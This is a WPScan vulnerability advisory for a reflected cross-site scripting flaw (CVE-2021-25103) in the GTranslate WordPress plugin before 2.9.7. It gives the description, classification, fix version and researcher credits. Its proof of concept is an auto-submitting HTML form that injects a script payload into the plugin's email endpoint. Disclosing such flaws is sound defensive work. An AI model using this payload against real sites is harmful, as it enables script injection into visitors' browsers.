WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

GTranslate < 2.9.7 - Reflected Cross-Site Scripting

Description

The plugin does not sanitise and escape the body parameter in the url_addon/gtranslate-email.php file before outputting it back in the page, leading to a Reflected Cross-Site Scripting issue. Note: exploitation of the issue requires knowledge of the NONCE_SALT and NONCE_KEY

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-content/plugins/gtranslate/url_addon/gtranslate-email.php?glang=e1n" id="hack" method="POST">
      <input type="hidden" name="body" value="<script>alert(/XSS/)</script>" />
      <input type="hidden" name="access_key" value="b4a0efbacac60a7d20cb891f5d656a3f" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
  <script>
    var form1 = document.getElementById('hack');
    form1.submit();
</script>
</html>

Affects Plugins

gtranslate
Fixed in version 2.9.7

References

CVE
CVE-2021-25103

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher

ZhongFu Su(JrXnm) of Wuhan University

Submitter

ZhongFu Su(JrXnm) of Wuhan University

Submitter website
https://blog.szfszf.top
Submitter twitter
JrXnm
Verified

Yes

WPVDB ID
90067336-c039-4cbe-aa9f-5eab5d1e1c3d

Timeline

Publicly Published

2022-01-10 (about 1 years ago)

Added

2022-01-10 (about 1 years ago)

Last Updated

2022-09-26 (about 8 months ago)

Our Other Services

WPScan WordPress Security Plugin